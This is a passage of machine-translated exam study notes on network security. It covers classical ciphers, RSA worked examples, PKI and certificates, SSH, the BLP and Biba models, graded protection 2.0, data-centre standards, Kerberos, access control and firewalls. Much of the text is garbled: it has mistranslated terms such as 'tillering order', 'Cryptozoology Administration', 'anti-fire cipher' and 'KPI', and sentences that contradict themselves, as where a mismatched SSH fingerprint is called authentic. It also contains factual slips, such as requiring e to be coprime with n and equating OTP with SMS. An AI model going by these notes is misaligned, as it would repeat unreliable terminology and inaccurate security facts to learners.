The final result is: 0 23 6. The corresponding 26 English ciphertext positions are axg
12. Simple alternative ciphers include (fear of statistical analysis attacks): addition cipher and multiplication cipher
13. Multi-table substitution cipher: vigenre cipher (Virginia, also one of the classical ciphers),
uses a two-dimensional table to get the ciphertext, with the plaintext at the beginning of the column and the key at the beginning of the row. The intersection of these two points is cipher text.
For example, if the plaintext c is known and the key is b:
abc
bhf
ckl ,
the ciphertext is f
14. Algebraic cipher (also one of the classical ciphers): First convert the letters corresponding to the plaintext and the key into the corresponding ascii numbers, then convert these numbers into binary, and then perform the logical XOR operation to obtain the ciphertext binary number, and then convert it into the corresponding asscii number to get the ciphertext.
Example:
plain text: data 1000100 1000001 1010100 1000001
key: lamb 1001100 1000001 1001101 1000010
cipher text: 0001000 000000 0011001 0000011
15. Asymmetric encryption RSA
The security of the RSA cryptosystem is designed based on the difficulty of decomposing large integers.
Features: The encryption and decryption algorithm is reversible, ensuring the confidentiality and authenticity of the data.
The International Trusted Computing Group TCG stipulates in the trusted computing standard that the encryption key and authentication key should be 1024 bits, and the platform root key and storage root password should be 2048 bits.
Difficulty of RSA Algorithm Factoring Based on Thousand Large Integers
The RSA digital signature does not sign the plain text, but signs the hash(M). It uses a timestamp and is signed first and then encrypted.
The multiplicative inverse element of RSA digital signature must exist, because the RSA formula is: e * d 三 1 mod φ (n). The
so-called multiplicative inverse element is the d private key
RSA digital signature verification: It is known that p=5 q=17, take e=5 and the message to be signed is x=10, calculate the signature y and verify the validity of the signature.
Solution: n=p q=85
φ(n) = (p-1) (q-1)=64
Because e=5, it satisfies gcd(64, 5) = 1 and satisfies that 64 and 5 are relatively prime, so the digital signature is Valid,
then d satisfies the RSA formula e *d three 1 mod φ(n) so d=13
Randomly generate two large numbers p and q
n=p* qp and q must be mutually prime
φ(n)=(p-1) *(q-1), that is, a number e that is smaller than n and relatively prime with n
: random The number e must satisfy the conditions: 1<e<φ(n) and be relatively prime with φ(n)
d: private key
Common formulas such as: 15 three 2 (mod 13) means that 15 and 2 are congruent to 13. To put it bluntly, the remainders of 15 divided by 13 and 2 divided by 13 are the same.
a=17, b=2 The number that satisfies the modulus congruence of a and b is 5, which means that the remainder of 17 divided by 5 and 2 divided by 5 is the same.
The inverse element of 67 mod 119 is the 16
formula: e *d three 1 mod φ(n)
67 is the e in this formula, φ(n) is 119, so use the substitution method formula (ex (d) - 1) mod φ (n) = 0 The final result is 16
pqd φ(n) These 4 are private keys that you need to keep yourself,
and en is the public key that needs to be made public.
Encryption formula: C = M^e mod n
Decryption formula: M = C^d mod n
Examinations generally require calculation of d, the formula is:
e * d三1 mod φ(n)
The first and simplest method:
select p=7, q=13, take e=5, when the plaintext m=10, find the private key d and output the ciphertext:
first calculate φ(n): φ(n) =(7-1) * (13-1)
We get that φ(n) is equal to 72
, then use this formula (ex (d) - 1) mod φ(n) = 0,
and then start from 1 and substitute it into d. Just see which one can divide φ(n) evenly.
Finally, we get 29
and then use the encryption formula: C = M^e mod n. The final remainder is the ciphertext.
The second algorithm:
For example:
φ(n) = 72 e=5 Find d:
e *d 三1 mod φ(n)
三: It means congruence, the remainders on both sides are equal.
5 *d mod 72 three 1 mod 72
can be obtained formula
5 *d mod 72 =1
(5 *d)/72 = X remainder 1
X uses algebra to represent the quotient
5 *d = 72X+1
d = (72X+1)/5
from 1 2 3... into X one by one, as long as it can be divided into 5
d = 29
16. Digital signatures have three requirements:
non-repudiation, authenticity, and message integrity.
The digital signature system consists of two parts: signature algorithm and verification algorithm.
Digital signatures can only detect tampering and forgery, but cannot guarantee data accuracy.
A digital signature is a binary string
17. What technologies does key management include:
key generation, reserve, distribution, use, update, revocation, backup, recovery, destruction, and auditing.
18. Digital certification:
Directory server: provides directory browsing
OCSP server: online certificate status query.
Registration server: Registration certificate.
Issuing server: uses the private key in the digital certificate to sign the issued certificate.
Digital certificates are divided into categories: personal certificates, institutional certificates, and device certificates.
Digital certificates are divided into: signature certificates and encryption
certificates according to their uses. Signature certificates are mainly used to sign user information to ensure the validity and non-repudiation of information.
Encryption certificates are mainly used to encrypt information transmitted by users to ensure the confidentiality of information. sex and integrity
Certificate validity is mainly based on the certificate signature contained in the digital certificate
In the PKI system, the way to ensure that digital certificates are not tampered with is to use the CA’s private key to sign the digital certificate.
The core of the project management method is the combination of risk management and goal management
20. The ssh protocol is based on the public key cryptography system and is generally susceptible to man-in-the-middle attacks and denial of service attacks. The algorithms used are: DH, sha, rsa.
SSH is a security protocol based on the application layer
The working mechanism of SSH is divided into 7 steps, as shown in Group 3-9. Currently, users
have three methods to authenticate the authenticity of the server's public key. The first is that the user directly carries a copy of the server's public key with him and reads it into the client computer before performing the key exchange protocol; the second is that after downloading the server's public key and its corresponding fingerprint from the public channel, the user first downloads the server's public key and its corresponding fingerprint through the phone Verify the authenticity of the server's public key fingerprint, and then use HASH software to generate a new fingerprint of the server's public key. Compare the downloaded fingerprint with the newly generated fingerprint. If the comparison results are the same, it means that the server's public key is authentic. Otherwise, the server's public key is authentic. The public key is false; the third method is to verify the server through PK.I technology.
ssh protocol:
Transport layer protocol: server authentication, data confidentiality, and information integrity protection.
User Authentication Protocol: As the unique identifier of this session.
Connection Protocol: Provides interactive sessions, and all session connections are implemented through tunnels.
Classical ciphers: substitution cipher, Caesar cipher, addition cipher, multiplication cipher, anti-fire cipher, simple substitution cipher, multi-table substitution cipher (Virginian cipher), algebraic cipher.
There are several uncommon symmetric ciphers: RC4, IDEA
Cipher summary:
According to the different processing methods of plaintext, it is divided into two types: block cipher and sequence cipher.
The difference is that
the plaintext processing unit is different. The block cipher divides the plaintext into several blocks and encrypts them separately. The sequence cipher divides the plaintext into bits or character sequences for processing.
Different keys are used: block ciphers use the same initial key to encrypt each plaintext block, and sequence ciphers use different keys to encrypt plaintext sequences.
Block cipher: Encrypts one block of plaintext at a time, and the ciphertext is only related to the encryption algorithm and key.
Sequence cipher: Encrypting one bit or one character at a time is not only related to the encryption algorithm and password, but also related to the position of the encrypted plaintext part in the entire plaintext.
Block cipher: There are two structures: feistel structure and sp structure. SP is a generalization of feistel.
Block ciphers include: DES, 3DES, AES, SM4
sequence ciphers include: RC4, ZUC,
Data link layer function: Convert the original transmission line into a logical transmission line, ensure correct binary transmission between actual entities, and ensure the correct order, error-free and complete data.
4. 1. Network security system:
The main characteristics of the network system: integrity, collaboration, process, comprehensiveness, and adaptability.
Use a comprehensive collaborative process to adapt to the whole.
2. BLP confidentiality model: write up (* feature), read down (simple feature), also called state machine model
3. BiBa integrity model: cannot read down (simple feature), cannot write up (* feature), call feature (when the integrity of the subject is less than the integrity of another subject, another subject cannot be called)
Integrity models include: biba, clark-wilson, dte
Chinese wall model: allow subject access
The information flow model can be used to analyze the covert channels of the system to prevent sensitive information from being leaked through covert channels. Covert channels usually manifest as low-security level subjects indirectly reading information generated by high-security level subjects. Covert channels are discovered through information flow analysis to prevent information leakage.
4. Data security capability maturity model
Data security capabilities are evaluated from the four dimensions of organizational construction, institutional processes, technical tools and personnel capabilities:
• The establishment of the structure, responsibility allocation and communication and collaboration
of the organizational construction data security organization; • Institutional procedures and institutional norms and regulations in the key data security areas of the organization Process implementation construction;
• Technical tools solidify security requirements or automate security work through technical means and product tools;
• Personnel capabilities—the awareness and professional capabilities of those who perform data security work one by one.
Evaluation from the four perspectives of organizational construction, institutional processes, technical tools, and personnel capabilities.
Organizational construction is based on institutional processes and uses technical tools to improve personnel work capabilities.
5. Software security capability maturity model
The software security capability maturity model is divided into five levels. The main processes at each level are as follows:
• CMMl level - patching;
• CMM2 level - penetration testing, security code review;
• CMM3 level vulnerability assessment, code Analysis, secure coding standards;
• CMM4 level software security risk identification, SDLC implements different security checkpoints;
• CMM5 level improves software security risk coverage and assesses security gaps.
The Capability Maturity Model (CMM for short) is a model for assessing the maturity of an organization's capabilities. Maturity
levels are generally divided into five levels: Level 1 - informal execution, Level 2 - plan tracking, Level 3 - fully defined, Level 4 - quantitative control, and Level 5 -
continuous optimization. Among them, the larger the level, the higher the maturity of the capability. The definitions of each level are as follows:
• Level 1 - informal execution: with random, disorderly, passive process;
• Level 2 - plan tracking: with active, non-systematic Process;
• Level 3 - Fully defined: Has a formal, standardized process;
• Level 4 - Quantitative Control: Has a quantifiable process;
• Level 5 Continuous Optimization: Has a process that can be continuously optimized.
At present, the maturity models in network security mainly include SSE-CMM, data security capability maturity model, software security capability maturity model, etc.
SSE-CMM (Systems Security Engineering Capability Maturity Model) is a system security engineering capability
maturity model. SSE-CMM includes
Engineering,
Organization, and
Project
SDLC information system security development life cycle: proposed by Microsoft.
Training, requirements, design, implementation, validation, release, response
SDLC provides three security measures that can be taken during the implementation phase of the development model:
Use approved tools: write secure code
Disable unsafe sets: disable non-hazardous functions in C language
Static analysis: detect the integrity of program pointers
6. Network defense in depth model:
4 lines of defense in depth: protection, monitoring, response, and recovery. It has the same meaning as the pdrr model.
Defense in depth: At present, the security industry believes that the network needs to establish four lines of defense:
security protection is the first line of defense of the network, which can prevent intrusions and harm to the network;
security monitoring is the second line of defense of the network, which can Timely detection of intrusions and damage;
real-time response is the third line of defense of the network, keeping the network "undefensible" when an attack occurs;
recovery is the fourth line of defense of the network, enabling the network to recover as quickly as possible after being attacked. "Resurrection" to minimize the losses caused by security incidents,
7. Layered protection model:
physical layer-network layer-system layer-application layer-user layer-management layer
8. Level protection model:
9. Network security system framework
10. Level protection work mainly includes: rating, filing, construction and rectification, level evaluation, and operation and maintenance.
11. Five levels of network security protection:
user autonomous protection level (isolating users and data ACL)
system protection audit level (fine-grained autonomous access control, auditing)
security mark protection level (mandatory access control)
structured protection level (considering concealment Channel)
Access Authentication Protection Level (Recoverable)
3-7 years for illegal intrusion. Destroyed for more than 5 years.
Cybersecurity Law: Implemented on June 1, 2017, passed by the Standing Committee of the National People's Congress on November 7, 2016.
Selling 10 times the illegal income of the Citizen Information Office
12. What are the changes in MPS 2.0:
expanded the scope of objects, proposed a triple protection system architecture, and strengthened the requirements for the use of trusted computing technology.
The main changes in Cybersecurity Level Protection 2.0 include: First, the scope of objects has been expanded to
include cloud computing, mobile Internet, Internet of Things, industrial control systems, etc. in the scope of the standard, constituting "general requirements for network security + network security expansion for new applications" "Requirements" content. The second is to propose a
triple protection system architecture supported by "secure communication network", "security area boundary", "secure computing environment" and "security management center". Third, the new level protection 2.0 standard strengthens the requirements for the use of trusted computing technology, and adds “trusted verification” control points at all levels.
Among them, the first level requires the device's system boot program, system programs, etc. to be trusted verified;
the second level adds important configuration parameters and applications for trustworthy verification, and the verification results are formed into audit records and sent to the security management center;
the third level adds applications Key execution links of the program are subject to dynamic trustworthiness verification;
Level 4 adds dynamic trustworthiness verification to all execution links of the application program.
All levels
13. NIST cybersecurity framework system:
identify, protect, monitor, respond, and recover.
14\, ISO27001 four basic steps:
planning and preparation of safety management system,
preparation of safety management system documents,
operation of safety management system,
audit and review of safety management system,
ISO safety structure architecture diagram,
network security organizational structure mainly includes leadership, management and execution layers and external collaboration layers, etc.
The main contents of network security construction:
1. Formulation and implementation of network security strategies and standards and specifications
2. Establishment of network security organization and management agencies and staffing of positions
3. Network security project planning, design and implementation
4. Network security plan design and deployment
5 , Network security engineering project acceptance evaluation and delivery
Generally speaking, the work related to network security strategy is mainly as follows:
• Investigate the needs of network security strategy and clarify its scope;
• Analyze the impact of network security strategy implementation;
• Obtain support from superior leaders for network security strategy work
; • Develop a draft network security strategy;
• Solicit opinions on network security strategy;
• Assessment of network security strategy risk holders;
• Approval of network security strategy by superior leaders;
• Release of network security strategy;
• Evaluation and revision of network security strategy effectiveness.
In network information systems of general enterprises and institutions, network security strategies mainly include network asset classification strategies, password management strategies, Internet usage security strategies, network communication security strategies, remote access strategies, desktop security strategies, server security strategies, and application security strategies. Eight categories. Network security strategies are usually expressed through rules and regulations, operating procedures and technical specifications.
9. Sustainable operation of network systems
The management goal of sustainable operation of network systems is to prevent interruption of network business activities and ensure that important business processes are not
affected by major failures and disasters. The requirements are to:
• Implement business continuity management procedures to prevent and Combined with recovery control,
the impact of disasters and security failures caused by natural disasters, accidents, equipment failures and deliberate sabotage should be reduced to an acceptable level;
• Analyze the consequences of disasters, security failures and service losses, formulate and implement Contingency plans to ensure that
business processes can be restored within the required time ;
• Adopt security control measures to identify and reduce risks, limit the consequences of disruptive events, and ensure
timely recovery of important operations.
The work related to network system sustainability operations mainly includes:
• Network operations continuity management procedures and network operation systems;
• Network operations continuity and impact analysis;
• Network operations continuity emergency plans;
• Network operations continuity plan Inspection, maintenance and re-analysis;
• Network operational status monitoring.
5. Physical security:
Physical security in a broad sense refers to the security of cyber-physical systems that integrate humans, machines, and things, consisting of hardware, software, operators, and the environment.
New hardware threats are more covert and harmful, and the attacks are proactive and non-proximate (hardware Trojans, hardware-coordinated malicious code Cloaker, hardware security vulnerability exploits Meltdown and Specter, software vulnerabilities-based Attacking hardware entities ("Stuxnet" virus, attacking computer entities based on environment)
The security protection of network communication lines adopts security measures from two aspects:
first, network communication equipment;
second, network communication lines. For important core network equipment, such as routers and switches, in order to prevent single-point security failures in these core equipment, equipment redundancy is generally adopted, that is, the equipment backs up each other.
The security measures for network communication lines also adopt the method of multi-channel communication. For example, the network connection can be through DDN dedicated lines and telephone lines.
1. Physical security threats
: Hardware Trojans: Malicious circuits are implanted in the chip to control the hardware.
Hardware-coordinated malicious code: Malicious hardware allows unprivileged users to access privileged memory areas.
Exploiting hardware security vulnerabilities: using side channel to obtain CPU instructions and affecting the information in the cache.
Attack hardware based on software: Use software vulnerabilities in the control system to control physical entity parameters.
2. Physical security protection:
There are four parts of the smart card operating system: communication management module, security management module, application management module, and file management module.
Environmental physical security, equipment physical security, system physical security
3. Data center design specification:
GB50174-2017
Internet data center engineering technical specifications:
GB51195-2016
4. Computer room protection:
waterproof, fire-proof, lightning-proof, rodent-proof, shock-proof, anti-theft, anti-electromagnetic and anti-static.
Computer room physical security threats:
Man-made: theft, destruction, explosion, hardware attack
Natural disasters: earthquake, flood, fire, lightning, rodent infestation.
5. General plan for computer room factory GB/T2887-2011
The computer room level is divided into ABC level 3. Level
A causes serious damage to the country and the tillering order of society. Level
B causes great damage to the tillering order of the country and society.
Level C basic computer room. requirements
According to the "Computer Site Security Requirements (GB/T 9361-2011)", the security level of computer rooms is divided into three basic levels: A, B, and C. The characteristics of each level are introduced below: •
Level A: Computer system After the operation is interrupted, it will cause serious damage to national security, social order, and public interests;
there are strict requirements for the safety of computer rooms and complete computer room security measures.
• Level B: If the computer system is interrupted, it will cause great damage to national security, social order, and public interests;
it has stricter requirements for the safety of computer rooms and has relatively complete computer room security measures.
• Level C: A situation that does not belong to Level A or B; it has basic requirements for the safety of the computer room and has basic computer
room security measures. Depending on the size and purpose of the computer system, computer room security can be implemented at a certain level or comprehensively at certain levels. Comprehensive implementation means that the computer room can be implemented according to certain levels. For example, a computer room can choose according to safety requirements: electromagnetic interference level A, fire alarm and fire extinguishing level C.
(GB/f2887-2011) 》, the computer room can use the following rooms (one room is allowed to be used for multiple purposes or increased or decreased as appropriate):
(1) Main work room: main computer room, terminal room, etc.;
(2) First-class auxiliary room : Low-voltage power distribution room, uninterruptible power supply room, battery room, air-conditioning room, generator room, gas
cylinder room, monitoring room, etc.;
(3) The second type of auxiliary room: data room, maintenance room, technician office;
(4) The third type of auxiliary room: storage room, buffer room, technician lounge, laundry room, etc.
6. Those with >10,000 racks are ultra-large computer rooms, those with 3,000>x>10,000 are large computer rooms, and those with <3,000 racks are small and medium-sized computer rooms.
7. The Internet IDC computer room is divided into three levels: R1, R2 and R3:
The main parts of R1 have certain redundancy capabilities, and the business retention is not less than 99.5%.
R2 infrastructure and network systems have certain redundancy capabilities, and the business retention is not less than 99.9%.
R3 has Certain fault tolerance, business maintenance is not less than 99.99%
The physical security of the CA computer room is an important guarantee for the security of the certification agency's facilities. The State Cryptozoology Administration issued the "Business Rules Specification for E-Government Electronic
Authentication Services", which puts forward normative requirements for the physical security of the CA computer room.
(1) The physical environment shall be strictly implemented in accordance with the requirements of GM/T0034, with relevant measures such as shielding, fire protection, physical access control, intrusion
detection and alarm, etc., and shielded room testing shall be conducted at least once every five years.
(2) All personnel in the CA computer room and office space should wear identification identification. The physical permissions of personnel entering and exiting the CA computer room
should be approved by the security management personnel in accordance with the security policy. (3) Records should be kept of all persons entering and exiting the CA computer room, and the entry and exit records of each area (such as surveillance system video tapes, access control records, etc.)
should be properly and safely kept and managed .
Only after confirming that these records have no safe use can they be
destroyed specifically.
(4) Establish and implement personnel visiting systems and procedures, and supervise and monitor visiting personnel. Security personnel regularly
conduct internal reviews and updates of access rights to CA facilities, and promptly follow up on violations of access to and from the physical areas of CA facilities.
(5) Take effective measures to protect equipment from power failure or abnormal network communication.
(6) Before disposing or reusing devices containing storage media (such as hard drives), check whether they contain sensitive data, and
sensitive data should be physically destroyed or securely covered.
(7) Develop relevant security inspection and supervision strategies, including but not limited to requirements for the preservation of internal sensitive or key business information, protection requirements for office computers, protection requirements for CA property, etc.
8. What are the threats to network communication lines:
line electromagnetic interference,
line leakage of information,
line cutoff
Security protection measures for communication lines:
core equipment must be redundant
and lines must adopt multi-channel communication methods.
9. Storage media protection:
storage data encryption,
data disaster recovery and backup,
and enhanced storage security management.
Double-click hot backup which is a hardware backup;
Fault-tolerant and disaster-tolerant storage technology: disk array, dual-machine online backup, offline backup
10. Hardware protection:
Hardware Trojan detection: reverse analysis method, power consumption analysis method, side channel analysis method.
6. Authentication The authentication
mechanism consists of a verification object, an authentication protocol, and an authentication entity. The
authentication object is the entity that needs to be authenticated (the claimant);
the authentication protocol is the exchange of authentication information between the authentication object and the authentication entity (verifier). rules;
the authentication entity makes a judgment on the authenticity or attributes of the identity based on the authentication basis provided by the verification object.
Authentication generally consists of two parts: Identification and Authentication.
Identification is an identity mark used to represent entity objects (such as personnel, equipment, data, services, applications) to ensure the uniqueness and recognizability of the entity. At the same time, there is a strong association with the entity. Identification generally uses
passwords, electronic signatures, and digital certificates.
The process of identifying and verifying the attributes claimed by an entity through digital credentials such as tokens, biometrics, and behavioral performance.
Authentication basis, also known as authentication information, usually refers to the certificate used to confirm the authenticity of the identity of the entity (claimant) or the
attributes it possesses. At present, the common certification basis mainly includes matching.
- Secret information known (Something You Know)
Secret information held by the entity (claimant), such as user passwords, verification codes, etc. - Physical Credentials (Something You Have):
Unforgeable physical devices held by the entity (claimant), such as smart cards, USB shields, etc. - Biometric features possessed by
the entity (claimant), such as fingerprints, voice, iris, face, etc. - Behavioral characteristics displayed
by the entity (claimant), such as mouse usage habits, keyboard keystroke intensity, geographical location, etc.
The types of router neighbor authentication include OSPF authentication, RIP authentication and
EIGRP authentication. Authentication modes include plaintext authentication (Plaintext Authentication) and message digest authentication (Message DigestAuthentication)
The identification factors used in continuous authentication are mainly cognitive factors (Cognitive factors),
physical factors (Physiological factors), and contextual factors (Contextual factors). Cognitive factors mainly include eye-hand coordination, application behavior patterns, usage preferences, device interaction patterns, etc. Physical factors include left/right hand, compression size, hand tremor, arm size and muscle use. Context factors mainly include transaction, navigation, device and network modes. For example, access to some websites determines the identity of the visitor based on address location information to confirm whether access is authorized.
Anti-tampering message authentication technology
The difference between authentication and encryption:
Encryption is used to ensure the confidentiality of data and prevent interception and eavesdropping.
Authentication carefully ensures the authenticity and message integrity of both the sender and the receiver, preventing attacks, impersonation, tampering, etc.
The difference between authentication and digital signature:
Authentication is based on the confidential data shared by the sender and receiver to identify the authenticity of the object. The sender and receiver of the authentication mutually verify the authenticity and cannot be verified by a third party. Authentication does not mean that the sender cannot repudiate and the receiver cannot forge. Ability.
The data of digital signatures is public, and digital signatures allow both parties and third parties to authenticate. Digital signatures have the ability that the sender cannot deny it and the recipient cannot forge it.
The difference between digital signatures and digital certificates: Digital certificates are issued by the CA Certificate Authority, an authoritative organization. They can provide an authoritative electronic document for identity verification on the Internet. People can use it to prove their identity in Internet interactions. Identity and identification of the other party. Digital signature (also known as public key digital signature, electronic signature) is a kind of ordinary physical signature similar to written on paper, but it is implemented using technology in the field of public key encryption and is used to identify digital information. A set of digital signatures usually defines two complementary operations, one for signing and another for verification.
Identity authentication includes the following:
1. Password authentication
1) Use one-way function to encrypt passwords: User passwords are stored in cipher text and can only be encrypted but not decrypted.
2) Use digital signature method to verify passwords: Using a public key storage system can resist replay attacks.
3) Two-way authentication of passwords: Both the sender and the receiver verify each other's identity.
4) One-time password: A password can only be used once and can resist replay attacks.
2. Biometric authentication:
fingerprint, palm print, face, voice, iris, retina, skeleton.
3. Message authentication includes:
message source authentication
, message sink authentication, and
message content authentication: including message confidentiality, message source authentication, and message authentication.
1. Certification consists of two parts: identification and identification.
The credentials for identification include: the secret information known, the credentials possessed, individual characteristics, and the behavior exhibited.
The difference between authentication and encryption is that
encryption is used to ensure the confidentiality of data and prevent passive attacks, such as interception and eavesdropping, while authentication is used to ensure the authenticity of the sender and receiver of the message and the integrity of the message.
2. Authentication is divided into: single-factor authentication, two-factor authentication, and multi-factor authentication. The other ones are: one-way authentication, two-way authentication, and third-party authentication.
3. One-time authentication is called OTP authentication, which is SMS authentication.
Continuous authentication is most secure: cognitive factors (behavioral preferences), physical factors (left and right hands, muscles), contextual factors (navigation, network patterns).
Continuous authentication prevents counterfeiting, phishing, man-in-the-middle attacks, identity theft, and social engineering.
A smart card is an integrated circuit card with memory and a microprocessor that can securely store authentication information and has certain
computing capabilities. Smart card authentication is based on the physical objects owned by the user, and smart card authentication technology is widely used in all aspects of society.
4. Authentication technology methods mainly include: password authentication, smart card authentication, biometric authentication, and kerberos authentication.
One-way authentication:
Two-way authentication:
The two parties agree in advance and share each other's passwords.
Assume that user A's password is PA and system B's password is PB.
Use one-way function f to realize two-way peer-to-peer verification of passwords:
1) AB: RA, RA is a random number of A
2 ) BA: f(PB||RA)||RB
3) After A receives PB, it uses the one-way function to calculate f(PB||RA). If it is equal to what it received, then B is real.
4) AB: f(PA||RB), B also uses a one-way function to calculate f(PA||RB). If it is equal to what is received, then A is real.
To prevent replay attacks, time parameters can be added to f(PA||RB) and f(PB||RA)
Password authentication is vulnerable to attacks: mainly man-in-the-middle, replay, eavesdropping, and guessing.
Password security must meet the following requirements: passwords must be encrypted and stored, passwords must be transmitted securely, passwords cannot be repudiated, and weak passwords must be avoided.
Password authentication process:
Kerberos authentication is based on network authentication, using c/s for strong identity authentication, symmetric cryptography, and a trusted third party to provide authentication services. It mainly provides single sign-on, which only needs to be authenticated once, so that the client can achieve one-time authentication for access to multiple servers.
Kerberos four entities:
Kerberos client: client used to access the server
AS authentication server (authentication server): identifies identity and provides TGS
TGS (ticket server): provides users with credentials
Application server: device or device that provides services to users system
Among them, AS and TGS are usually collectively called KDC (Key Distribution Center). A ticket is
a collection of information required to securely transmit a user's identity, mainly including the client's Principal, the destination server's Principal, the client's IP address, timestamp (the time when the Ticket is distributed), the lifetime of the Ticket, As well as things like session keys. The Kerberos V5 authentication protocol mainly consists of six steps, as shown in Figure 6-13.
The Kerberos protocol requires users to undergo double authentication of AS and TGS. There are two main advantages.
(1) It can significantly reduce the number of times the ciphertext of the user key is exposed, thus reducing the attacker's
accumulation of ciphertext related to the user key.
(2) The Kerberos authentication process has the advantage of Single Sign On (SSO). As long as the user gets the TGT
and the TGT has not expired, the user can use the TGT to complete the authentication process to any server through TGS without having to Please re-enter password.
However, Kerberos also has shortcomings. The Kerberos authentication system requires solving host node time synchronization issues and resisting denial of service attacks. If the time of a certain host is changed, the host cannot use the Kerberos authentication protocol. If the server's time is incorrect, the entire Kerberos authentication system will be paralyzed. Although Kerberos V5 has its shortcomings, it is still a relatively good security authentication protocol. Currently, both Windows systems and Hadoop support Kerberos authentication.
KPI public key infrastructure system:
The public key cryptography system can not only implement encryption services, but also provide identification and authentication services. In addition to confidentiality,
trusted distribution of public key cryptography is also a problem faced by it, that is, the authenticity and ownership of the public key. To solve this problem, people use the method of "public key certificate", similar to ID cards and passports. A public key certificate binds an entity to a public key and allows other entities to verify the binding relationship. For this purpose, a trusted third party is needed to guarantee the identity of the entity. This third party is called a certification authority, or CA (Certification Authority) for short. The CA is responsible for issuing certificates, which contain the entity name, public key, and other identity information of the entity. PKI (Public Key Infrastructure) is a security service facility related to the hardware, software, personnel, policies and processes required to create, manage, store, distribute and revoke public key certificates. PKI provides a systematic, scalable, unified, and easily controlled public key distribution method. The main security services based on PK.I include identity authentication, integrity protection, digital signature, session encryption management, and key recovery. Generally speaking, PKI involves negotiation and operations between multiple entities. The main entities include CA, RA, terminal entity (CEnd Entity), client, and
directory server, as shown in Figure 6-19.
PKI security service functions: identity authentication, integrity protection, digital signature, session encryption, key recovery
.
…
The functions of each PK.I entity are described as follows:
CA (Certification Authority): Certificate authority, mainly responsible for issuing certificates, Revocation and Renewal;
Certification authorities are responsible for issuing, managing and revoking certificates for a group of end users.
RA (Registration Authority): Certificate registration authority, which links the public key with the identity and
other attributes of the corresponding certificate holder for registration and guarantee; RA can act as
an intermediate . The auxiliary CA completes most other certificate processing functions.
Directory server: CAs typically use a directory server to provide certificate management and distribution services.
End Entity: Refers to objects that require authentication, such as servers, printers, email addresses,
users, etc.
Client: refers to users who need PK.I-based security services, including users, service processes, etc.
5. Public key cryptography PKI entities include
CA: certificate issuance, management, revocation, and update.
RA: Certificate login authority, used to assist the certificate processing function between the CA and the client.
Terminal entity: The object that requires authentication.
Client: User who needs PKI-based services.
directory server.
There is no CA's public key on the certificate, only the holder's public key.
CA issuance process:
The user submits RA-approved registration information and his/her identity information
to the CA to verify the correctness and authenticity of the submitted information
. The CA generates a key for the user and makes a backup
. The CA generates a certificate and applies a signature
to a copy of the certificate. Hand it over to the user and archive it in the database
Key management for symmetric ciphers:
6. Fast Online Authentication (FIDO):
FIDO uses standard public key encryption technology to provide strong authentication. FIDO's design goal is to protect user privacy and use fingerprint, face, and voice authentication.
Fast IDentity Online, also known as FIDO, uses standard public key encryption technology to provide strong authentication. FIDO
's design goal is to protect user privacy by not providing information that tracks users, and user biometric information does not leave the user's device.
7. The main product types of authentication technology include 5 types:
system security enhancement: U disk and password (dongle)
biometric authentication: face recognition
electronic authentication service: PKI and SSL
network access control: 802.1X poralt mac authentication terminal access
identity Authentication gateway: digital certificate, single sign-on.
8. eID citizen network electronic identity is an important guarantee for the national network, mainly using asymmetric keys and digital certificates.
eID authentication involves the eID service platform, application service providers and users holding eIDs.
9. Evaluation indicators for certified products:
safety functional requirements, safety performance requirements, and safety assurance requirements.
10. Components of the authentication mechanism:
verification object, authentication protocol, and identification entity.
Authentication: Authenticate the sender and receiver and check the integrity of the message.
BAA is used for web access authentication, which means that the web page automatically pops up the authentication page to fill in the user and password.
7. Main elements of access control model:
Subject: It is the customer's operator.
Client: What is being manipulated by the subject is towards you.
Reference monitor: monitors the operational information between clients and subjects and stores it in the audit library.
Access control database: stores access policy information between subjects and customers.
Audit library: stores information about the success or failure of subjects accessing objects.
Three access control implementation methods:
Capability table:
(subject) Administrator<(object) traceroute.mpg: read, run>
Access Control List:
(Object) traceroute.mpg <(Subject) Administrator: Read, Run>
access control matrix
Types of access control:
Discretionary access control:
1. Row-based discretionary access control (capability table, prefix table, password)
2. Column-based discretionary access control (protection bit rwx, access control list)
The only access control list is that files are in the left column, and users and corresponding permissions are on the right:
file ------> admin: r,w
Both the capability table and the matrix have the files and usernames swapped.
Mandatory access control:
role-based access control RBAC
attribute-based access control ABAC
2. Discretionary access control means that objects access according to their own permissions.
Discretionary access control is divided into two categories: row-based and column-based discretionary access.
Row-based: capability tables (read, write, execute), prefixes, passwords. Attach a list of accessible objects to each subject
Column-based: protection bits (bit rwx represents access permissions linux), access control list (acl). Attached to each object is a list of subjects that can access it
3. Four elements of role-based access control used in windows sloaruis system:
RBAC: user, role, session, permission. There can be multiple users and multiple roles in a system.
4. The access control process generally has five steps:
clarify the assets to be controlled and managed,
analyze the security requirements of the assets to be managed
, formulate access control strategies,
implement access control strategies,
and operate and maintain strategies.
5. Password principles:
Password must be more than 8 characters long, use uppercase and lowercase letters plus numbers and special letters.
Accounts and passwords cannot be the same.
Weak passwords cannot be used.
Sharing of accounts and passwords
is prohibited. Passwords must be changed every once in a while.
Password files must have advanced access permissions.
The number of account login errors is generally limited to 3 times.
6. Types of access control:
4A: Authentication, authorization, account, audit, common role methods to control authorization management
Security gateway: such as firewall, UTM device
System security enhancement: operating system and database hardening products, selinux
The log file is a special file in the Windows system. It records the running status of the Windows system, such as
the startup, operation, shutdown and other information of various system services. There are three types of Windows logs: system logs, application logs and security logs, and their corresponding file names are SysEvent.evt, AppEvent.evt and SecEvent.evt. These log files are usually stored in the "system32\config" directory of the operating system installation area.
Access control rules: Access
control rules based on user identity - account password
Role-based access control rules - role permissions Address-
based access control rules - IP, domain name, physical address
Time-based access control rules - off-duty hours
based on abnormal events Access control rules – 3 failed logins, freezing
Access control rules based on the number of services – a certain threshold of service capabilities
Passwords are an important basis for most current network implementations of access control and identity authentication. Therefore, password management is particularly important and generally
adheres to the following principles:
• Password selection should be at least 8 characters, and a combination of uppercase and lowercase letters, numbers, and special characters should be used. ;
• It is forbidden to use the same password as the account;
• Change the system default password to avoid using the default password;
• Limit the number of account logins, it is recommended to be 3 times;
• It is forbidden to share accounts and passwords;
• Password files should be encrypted and stored only by super users can be read;
• It is forbidden to transmit passwords in clear text on the network;
• Passwords should have an aging mechanism to ensure frequent changes, and reuse of passwords is prohibited;
• Run password cracking tools on all accounts to check whether there are weak passwords or no passwords account.
8 (Key points). There are two types of firewall strategies:
whitelist and blacklist.
Firewall matching operations include: deny, forward, audit
Firewall functions:
filter non-secure network access;
restrict network access;
network access audit;
network bandwidth control;
collaborative defense.
According to the TCP/IP protocol level, the firewall's access control can act on the network interface layer, network layer, transport layer, and
application layer.
Several areas of the firewall:
• Public external networks, such as the Internet;
